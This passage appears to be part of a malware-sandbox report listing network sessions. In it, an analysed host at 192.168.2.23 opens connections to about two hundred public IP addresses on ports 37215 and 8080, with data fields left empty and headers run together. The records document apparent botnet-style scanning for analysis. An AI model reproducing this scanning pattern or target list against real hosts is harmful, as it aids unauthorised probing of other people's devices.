                                                        13626192.168.2.233574841.13.51.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13627192.168.2.2357364197.233.51.6037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13628192.168.2.233941041.245.2.17637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13629192.168.2.2333920157.83.3.10837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13630192.168.2.2354176197.206.142.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13631192.168.2.2348878157.12.1.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13632192.168.2.234915641.157.47.7437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13633192.168.2.2353788157.255.68.23437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13634192.168.2.2337158136.93.126.16537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13635192.168.2.2335526148.183.148.23737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13636192.168.2.2342028157.147.158.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13637192.168.2.2348264157.157.69.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13638192.168.2.2360472121.249.92.3837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13639192.168.2.2340260173.62.168.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13640192.168.2.235514841.8.234.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13641192.168.2.235948898.213.156.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13642192.168.2.234194690.240.172.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13643192.168.2.233901224.249.227.237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13644192.168.2.2347518157.217.218.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13645192.168.2.2345530157.133.15.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13646192.168.2.2345634211.24.233.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13647192.168.2.233335241.143.42.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13648192.168.2.234054234.169.142.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13649192.168.2.235140041.243.0.8437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13650192.168.2.2353550157.116.157.137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13651192.168.2.234493841.201.222.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13652192.168.2.2343398157.99.10.537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13653192.168.2.235493069.124.218.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13654192.168.2.236027441.1.52.9437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13655192.168.2.2339998184.153.112.7637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13656192.168.2.2359458197.75.18.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13657192.168.2.2350766149.217.169.5437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13658192.168.2.233621841.154.95.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13659192.168.2.2358970106.28.153.11237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13660192.168.2.2339088197.137.24.5037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13661192.168.2.2340624197.255.143.24937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13662192.168.2.233609041.63.221.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13663192.168.2.2342956180.66.12.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13664192.168.2.234503841.52.136.22737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13665192.168.2.234425241.63.86.12937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13666192.168.2.233487099.76.30.3437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13667192.168.2.233983835.90.214.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13668192.168.2.2345168197.18.132.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13669192.168.2.2358768109.110.60.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13670192.168.2.233647841.83.165.1437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13671192.168.2.2340998176.249.153.437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13672192.168.2.2341416157.203.244.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13673192.168.2.2353022157.185.30.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13674192.168.2.2350670157.48.212.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13675192.168.2.2344126192.34.159.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13676192.168.2.2360554157.142.117.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13677192.168.2.2332830197.77.8.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13678192.168.2.233625241.207.30.12437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13679192.168.2.233471832.236.251.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13680192.168.2.235449641.81.238.14737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13681192.168.2.234396041.231.139.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13682192.168.2.2340826126.191.164.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13683192.168.2.233446441.136.21.20837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13684192.168.2.2350714200.214.236.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13685192.168.2.2335250157.197.223.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13686192.168.2.2349742197.119.25.19037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13687192.168.2.234550043.157.165.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13688192.168.2.2341626197.147.81.4237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13689192.168.2.2340964157.134.132.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13690192.168.2.2352804197.133.84.18237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13691192.168.2.235076041.110.152.13537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13692192.168.2.234587641.246.18.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13693192.168.2.2355730197.161.182.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13694192.168.2.2352042157.229.11.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13695192.168.2.234024841.3.48.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13696192.168.2.235755041.175.72.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13697192.168.2.2336918197.238.174.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13698192.168.2.2345436197.131.99.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13699192.168.2.2360064157.13.223.19937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13700192.168.2.2338320197.121.221.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13701192.168.2.2350748107.13.252.21437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13702192.168.2.2343526198.25.170.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13703192.168.2.235336890.85.64.837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13704192.168.2.2350020197.27.246.1337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13705192.168.2.2351486210.136.98.5237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13706192.168.2.2337486118.143.110.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13707192.168.2.235471641.18.17.24237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13708192.168.2.236035041.252.82.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13709192.168.2.2359748157.250.105.22537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13710192.168.2.234983475.172.94.7937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13711192.168.2.2339168157.97.248.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13712192.168.2.2360738197.198.19.11737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13713192.168.2.2339470157.144.180.10737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13714192.168.2.2353902204.13.104.19637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13715192.168.2.2352498157.176.9.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13716192.168.2.2360928197.133.150.7537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13717192.168.2.2360436157.72.144.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13718192.168.2.233691441.137.251.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13719192.168.2.2353396197.76.252.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13720192.168.2.233465818.79.149.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13721192.168.2.233658661.78.229.25337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13722192.168.2.2353358197.222.55.6537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13723192.168.2.2340592197.100.86.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13724192.168.2.233471041.97.175.23237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13725192.168.2.2349656157.214.254.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13726192.168.2.233658841.93.75.24337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13727192.168.2.2333328157.2.172.5337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13728192.168.2.2357900204.236.46.1737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13729192.168.2.2341098157.24.218.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13730192.168.2.2353854197.181.250.2537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13731192.168.2.233637041.189.52.21537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13732192.168.2.2342804157.38.239.18837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13733192.168.2.234709841.155.187.12637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13734192.168.2.234424841.86.156.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13735192.168.2.2340614157.8.86.10037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13736192.168.2.2359988139.179.197.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13737192.168.2.2356082125.10.198.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13738192.168.2.234190464.14.147.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13739192.168.2.2357282149.151.42.4737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13740192.168.2.233615641.69.190.9237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13741192.168.2.2357184157.1.120.17737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13742192.168.2.234006841.115.236.21137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13743192.168.2.234148853.220.168.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13744192.168.2.2357628157.219.159.16837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13745192.168.2.2340230157.95.136.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13746192.168.2.2356104117.169.154.4537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13747192.168.2.235938441.226.66.18537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13748192.168.2.23345345.82.255.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13749192.168.2.2360922157.110.145.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13750192.168.2.233550675.55.222.2478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13751192.168.2.235453086.176.229.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13752192.168.2.235242682.107.140.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13753192.168.2.2346954207.7.95.2328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13754192.168.2.2356252201.229.22.498080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13755192.168.2.2340490117.9.50.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13756192.168.2.235191446.108.194.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13757192.168.2.234748245.100.218.28080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13758192.168.2.2334968116.167.228.1428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13759192.168.2.233621420.90.83.1668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13760192.168.2.2350246103.174.90.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13761192.168.2.23399481.212.153.1768080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13762192.168.2.234629654.41.90.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13763192.168.2.2334814208.194.238.1948080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13764192.168.2.2350772220.132.31.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13765192.168.2.2354440207.172.125.108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13766192.168.2.2333178173.210.208.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13767192.168.2.2346870192.72.162.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13768192.168.2.2336092204.10.156.1828080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13769192.168.2.2359404149.191.147.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13770192.168.2.2334186177.212.31.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13771192.168.2.2347132188.155.206.848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13772192.168.2.235395082.22.185.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13773192.168.2.234646882.76.237.588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13774192.168.2.235233886.55.156.638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13775192.168.2.2337572143.18.124.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13776192.168.2.234351273.145.32.348080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13777192.168.2.234318246.37.230.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13778192.168.2.2341986195.151.34.2308080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13779192.168.2.235428442.133.22.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13780192.168.2.233909848.34.226.688080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13781192.168.2.2354834123.213.201.538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13782192.168.2.2338490211.87.107.658080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13783192.168.2.2336254158.13.10.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13784192.168.2.2348242126.166.147.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13785192.168.2.2354000202.33.67.2448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13786192.168.2.236097874.135.220.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13787192.168.2.235059224.248.145.1478080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13788192.168.2.2339074138.163.142.558080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13789192.168.2.2351876186.135.159.1848080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13790192.168.2.2356858125.112.95.1138080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13791192.168.2.2354232153.186.241.668080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13792192.168.2.235254638.241.79.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13793192.168.2.2341426147.163.132.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13794192.168.2.236083493.46.232.1988080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13795192.168.2.2347844108.155.139.628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13796192.168.2.2357670153.186.204.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13797192.168.2.234911041.65.82.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13798192.168.2.2339768137.229.64.368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13799192.168.2.234642275.41.239.2118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13800192.168.2.233541635.5.8.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13801192.168.2.234641689.211.43.1268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13802192.168.2.235317666.121.231.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13803192.168.2.235678240.1.184.548080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13804192.168.2.2351010165.48.194.2268080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13805192.168.2.2350426206.200.51.1038080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13806192.168.2.2334062207.245.95.1898080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13807192.168.2.2338146158.146.239.418080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13808192.168.2.235012490.44.29.728080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13809192.168.2.2338644145.223.20.2208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13810192.168.2.2334834204.85.181.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13811192.168.2.2345272217.242.31.1648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13812192.168.2.2358286205.64.31.1838080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13813192.168.2.2339422189.243.168.148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13814192.168.2.2358958212.126.151.2158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13815192.168.2.236022035.153.34.1258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13816192.168.2.2350938171.159.203.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13817192.168.2.2357060152.109.123.118080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13818192.168.2.235220247.188.220.2458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13819192.168.2.2353774149.41.251.158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13820192.168.2.2359430128.88.77.128080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13821192.168.2.234124293.162.19.648080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13822192.168.2.235283698.49.227.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13823192.168.2.2347342211.148.34.968080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13824192.168.2.2334056196.133.233.2178080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13825192.168.2.235307269.206.54.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13826192.168.2.2349584220.176.46.1708080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13827192.168.2.233802081.199.142.1868080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13828192.168.2.235647498.215.13.778080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13829192.168.2.234117065.80.254.1328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13830192.168.2.2356518123.75.194.1018080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13831192.168.2.233872867.169.172.238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13832192.168.2.2359670105.24.205.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13833192.168.2.2360038159.20.31.468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13834192.168.2.234720041.249.93.328080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        13835192.168.2.2336852133.73.226.258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
